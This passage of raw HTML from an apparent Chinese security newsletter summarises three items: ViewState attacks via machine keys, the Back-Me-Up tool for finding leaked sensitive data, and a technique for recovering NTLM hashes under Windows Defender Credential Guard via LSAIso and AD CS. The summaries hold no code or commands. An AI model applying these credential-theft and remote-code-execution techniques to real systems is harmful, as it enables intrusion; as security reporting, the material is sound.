		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">IIS机器密钥和视图状态安全漏洞：识别、修复及防御</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">IIS 永久漏洞被利用，ViewState 攻击持续活跃</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn2p6s1XVfMoaQYTCUPYkXJrv28dfbBeY3QicNQicAtffIuhibYkqE0bVmKZfbcJDU7QUqoarJa7S3mA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn2p6s1XVfMoaQYTCUPYkXJrv28dfbBeY3QicNQicAtffIuhibYkqE0bVmKZfbcJDU7QUqoarJa7S3mA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855414812155212"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">View State是ASP.NET应用程序中用于维护状态的关键机制，但它可能会被用于攻击。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">View State的安全性依赖于加密和认证，但并非所有应用程序都启用了这些安全措施。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者可以通过获取有效的机器密钥和相关的安全算法来构造恶意的View State，从而实现远程代码执行。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">检测View State攻击的关键在于分析Windows事件日志，特别是事件ID 1316。</section></li></ul>
	<br/>
	<p>🏷️: 视图状态, 漏洞利用, 微软Exchange, 网络安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x02
			 Back-Me-Up：自动化漏洞挖掘工具</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Back-Me-Up 是一个自动化漏洞挖掘过程的工具，它通过收集互联网档案中的URLs，并使用正则表达式和模式来检测敏感数据泄露。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="1" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="500" src="https://wechat2rss.xlab.app/img-proxy/?k=d8f4be5b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnI0TyTWFxr5ibibd88XNQwbicyMD8GdDsNhy9DDXYapeaDepRJoXmUbkbZAKI4zqlicIz7aqQpG2YIHA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.22407407407407406" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=f902f834&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnI0TyTWFxr5ibibd88XNQwbic2qabGFPlMjAf1LNHIZ3aHlGBVKH1xqPlEXkI3d9LJyeHTHibbuTgwyQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.30277777777777776" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=8b37ae25&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnI0TyTWFxr5ibibd88XNQwbicS1369pn5BgkVV0dlvykuibLqCPsFn6mb4K7icIib8kmMSGJsad0AlG2zw%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">自动化漏洞赏金流程工具</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnI0TyTWFxr5ibibd88XNQwbicEbt2bknfo7WlB6iar33QJgyfynv75xzzYMRvzsLA5vNgkb20JqvBneg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnI0TyTWFxr5ibibd88XNQwbicEbt2bknfo7WlB6iar33QJgyfynv75xzzYMRvzsLA5vNgkb20JqvBneg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855414814881142"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Back-Me-Up 旨在帮助漏洞赏金者和渗透测试人员自动化敏感数据泄露的检测过程。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该工具的核心功能包括自动化的URL收集、敏感扩展名的过滤和基于正则表达式的数据分析。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Back-Me-Up 提供了一个用户友好的命令行界面，并且具有灵活性，可以根据用户的需求添加更多的扩展名。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">作者强调了该工具的合法和负责任使用，并对其使用提供了明确的指导和限制。</section></li></ul>
	<br/>
	<p>🏷️: 漏洞挖掘, 数据泄露, 自动化工具</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x03
			 挑战通过：击败Windows Defender凭证防护</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文介绍了新的技术手段，用于在Windows Defender Credential Guard保护下从加密的凭据中恢复NTLM哈希值。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnI0TyTWFxr5ibibd88XNQwbicVtXia2Whup5SibsHibmJzovcZrdB7fUxcf3FXSp6h2I6DKic45ewGyKN0Q/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnI0TyTWFxr5ibibd88XNQwbicVtXia2Whup5SibsHibmJzovcZrdB7fUxcf3FXSp6h2I6DKic45ewGyKN0Q/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844212585884888"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Credential Guard虽然提供了保护，但并非完全安全。攻击者可以通过新的技术手段来绕过其保护机制。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者可以通过与LSAIso进程的交互来获取加密的NTLM哈希值。通过ALPC（Advanced Local Procedure Calls）和RPC（Remote Procedure Calls）与LSAIso进程通信，可以执行操作以解密NTLM哈希值。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">加密的NTLM凭据可以跨重启持久化。这意味着即使系统重启，攻击者仍然可以利用之前获取的信息来进行攻击。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者可以利用AD CS来请求证书。通过模拟用户的证书请求，攻击者可以获取证书并进一步利用该证书来认证并提取NTLM哈希值。</section></li></ul>
	<br/>
	<p>🏷️: NTLM, LSASS, LSAIso, 凭证, 哈希</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
